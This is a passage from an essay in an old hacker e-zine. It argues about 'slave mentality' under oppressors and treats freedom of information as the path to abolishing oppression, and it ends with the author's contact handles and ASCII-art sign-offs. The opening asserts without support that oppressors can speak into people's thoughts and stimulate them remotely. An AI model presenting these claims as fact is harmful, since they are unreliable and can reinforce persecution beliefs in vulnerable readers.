oppressors play such a large role in their new life being able to interact verbally with there own mental thoughts, and to remotely physically stimulate them, plus the obvious entire social dominance in sheer numbers. Thus, the individual often tries to tie in all these occurrences into as much of a coherent story as possible so as to solidify a conceptual picture of reality. If factual reality based theologies are not available, it is no wonder, that the supernatural often plays a role in the new ideologies of the oppressed. REALITY BASED RE-ENFORCEMENT As described, the supernatural, or religious based rationalizations and conceptualizations are often used by an individual in a "brainwashing" environment. A powerful technique to use to combat attacks on the oppressed picture of reality, is to re-enforce it. Typical things that are always known to occur that cannot be controlled is such things as the sun rising every morning, a pretaped movie or TV show remaining constant (note that the perception of the perceived communication may not be constant, as this is subjective), or even a tree not turning into a giraffe and running away (unless halucenagenetic drugs are used to induce such an image). Note, that such things as a persons manner or responses, the telephone system, the radio, the premeditated prerecorded TV show or communicate message can not be used for reality re-enforcement because they are externally controllable. Likewise, such things as your general person being pain free, not having a headache, not getting angry, should generally not be used for re-enforcement either. THE PHYSICAL MANNER UNDER THE SLAVE MENTALITY That is the internal result of such a social structure so heavily using such at times incomprehendable inhumane acts as a desire to onset the slave mentality. Externally, the results are thoroughly determined by the specific ideology that is being imposed by the oppressor, that is, the slave mentality which is visible in our physical environment. Thus it is not simply possible to resist totally passively by not submitting on a mental level as physical dominance is the desired result of the oppressors. For the amount of time involved, physical violence is little used to emit the desired responses from

the individual. Thus, while it may be true that you appear to be mentally free, if your physically submitting, your not at all mentally free, and rather living in a repressed mind-set to unburdon yourself of the desire to remain free, yet also have a high quality of life. FREEDOM OF INFORMATION TO ABOLISH THE SLAVE MENTALITY The open discussion of oppression and the scenarios of each individual would greatly influence the course of oppression for our people. The distribution of information providing factual information of events would serve to aid resistance in many facets, just as the denial of information helps aid oppression and slave mentally in as many areas. Psychologically it is true, that often many times, the fear of the unknown is greater than the actual event. This is used by the oppressors to elicit submissive responses from the oppressed. By distribution of factual information of such events and their results, this fear can be alleviated. It is true, that if the majority of the oppressed today knew about the ordeal to follow once it had started, then the quality of life for those people would be greatly enriched, not only by reducing the inherent fear that the unknown is associated with, but by enabling them to more effectively resist the effects of demoralisation and even to the extent of resisting and possibly nullifying submissive actions to the oppressors. Thus distribution of information can effectively deny the onset of the slave mentality. However, it can go further than that. It is a known fact, that even in a non oppressed society, that the distribution of information and alternative information is a good thing. The laws representing freedom of speech are supposedly here to enhance society, and this is true in its pure form, however, freedom of speech can be considered a paradoxical statement for such a law to protect individuals from such denials of information, if it is being selectively ignored to factions of society. Freedom of speech allows not only the distribution of information, but increases the net effect of advancement by giving each individual the ability to work upon other's ideas and to also stir up a person to an extent where they are willing to act if the cause is just. It is factual, that the introduction of the ability to protest peacefully, has allowed people to rally help, and help form a mind-set where a person feels able to change the social structures in which they exist without resorting to actions in cases to equal the oppressors. Certainly, there is no guarantee that such protests and rallies do entrench the majority of people to their cause if just, but it does serve to make such ideas known to the majority of the public, which can be used to sway the social structures by forcing people to think about it, without using such rationalizations that an open discussion would immediately squash. FREEDOM OF INFORMATION AND THE ABOLISHMENT OF OPPRESSION This raises another point, in that while effective for the oppressed to resist strongly against the oppressors, it also enables the oppressors to reconsider their views, and although this is certainly not a case where such open and logically sound information immediately sways the masses to the righteous, it does start the gradual but inevitable change to that direction, which should be the eventual goal of any social system. That is, ultimately, the desired goal is to see that any individual never has the desire to be an oppressor and would equally feel as I, that it is the epitome in all that is vile in the uneducated and ignorant human being. This however, is not the primary goal of distribution of information for our people at such a stage. It does serve to paint a picture that one day, almost certainly not in the lifetime of a person in this age, when all persons will be treated equal and the slave ideology will have finally be thwarted to an extent where it is

thwarted, not just selectively eliminated from groups of the day. CONCLUSION This document has given important information to the section of society that is oppressed in a slave/master relationship that is existent in the current population. This information, has been specifically aimed at this oppressed group, to rally public awareness and support in the abolition of the structural system of subservience. It is almost certainly known, that this document will do little to aid the changing of general public opinion in the oppressors, however, it does give an opportunity for those who endorse abolishment to offer silent support in the private distribution of this information, as they are in easily the best position for targeting the individuals this document was designed specifically for. This however, is admitadlly, not more than an idle hope for future generations. The implementation of the slave/master social structure as described, show that lack of awareness is one of the primary central driving forces to the oppression that is present in society. The points made to start the change or at least make publicly aware to the oppressed of this information, can thus be seen as effective tools in the quest of the ultimate goal in an abolition of oppression. Silvio Cesare silvio@big.net.au FOR THE OPPRESSED, COMMUNICATION IS THE BEGINNING OF ABOLITION.

in IRC channel #freedog, efnet network, nick 'silvio' oz.org network (Australia), nick 'silvio'

Thatz all Folkz, until issue 10, goodbye! and farewell! `Mb `b ..rmMMbmy.. `b .dMP"' `"VMb. `b .p' `Mb `b ,p' `Mb ,mdMMbm. q. ,dP `b ,MP"' `"MMb. `b .P `b ,P' `b. `L M `L ,P ****b4b0!*** MM MM' `P `P ~lusta --====---====----======--[.this has been an offical.] __ ____ __ ____ ___ __ / /( _ \ /. | ( _ \ / _ \\ \ / / ) _ < (_ _) ) _ < ( (_) )\ \ / / (____/ (_) (____/ \___/ \ \ | -> p r o d u c t i o n <| -b4b0 b4b0 b4b0 b4b0 b4b0 b4b0 b4b0 b4b0 b4b0\__________________________________________/